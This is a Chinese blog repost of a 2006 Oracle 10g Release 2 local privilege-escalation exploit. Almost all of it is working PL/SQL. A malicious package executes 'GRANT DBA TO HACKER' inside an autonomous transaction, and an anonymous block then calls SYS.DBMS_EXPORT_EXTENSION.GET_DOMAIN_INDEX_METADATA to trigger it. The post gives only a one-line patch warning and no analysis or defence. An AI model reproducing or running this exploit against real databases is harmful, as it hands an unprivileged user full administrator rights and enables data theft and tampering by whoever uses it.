ORACLE O day exploit

最新推荐文章于 2022-11-30 17:06:35 发布

congxing8184

最新推荐文章于 2022-11-30 17:06:35 发布

阅读量62

点赞数

零DAY攻击漏洞[@more@]

Oracle <= 10g Release 2 (DBMS_EXPORT_EXTENSION) Local SQL Exploit|
来源：www.vfocus.net 作者：N1V1Hd 发布时间：2006-04-27

/* 0day, description is wrong. /str0ke */

/*
* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
*
* Patch your database now!
*
* by N1V1Hd $3c41r3
*
*/

CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER;
END;
/

CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER
IS
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
COMMIT;
RETURN(1);
END;

END;
/

DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
INDEX_NAME := 'A1'; INDEX_SCHEMA := 'HACKER';
TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'HACKER';
VERSION := '10.2.0.2.0'; GMFLAGS := 1;

v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME
=> TYPE_NAME,
TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
NEWBLOCK, GMFLAGS => GMFLAGS
);
END;
/

来自 “ ITPUB博客 ” ，链接：http://blog.itpub.net/9194732/viewspace-911957/，如需转载，请注明出处，否则将追究法律责任。

转载于:http://blog.itpub.net/9194732/viewspace-911957/

congxing8184

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
ORACLE O day exploit

零DAY攻击漏洞[@more@]Oracle <= 10g Release 2 (DBMS_EXPORT_EXTENSION) Local SQL Exploit| 来源：www.vfocus.net 作者：N1V1Hd...
复制链接

扫一扫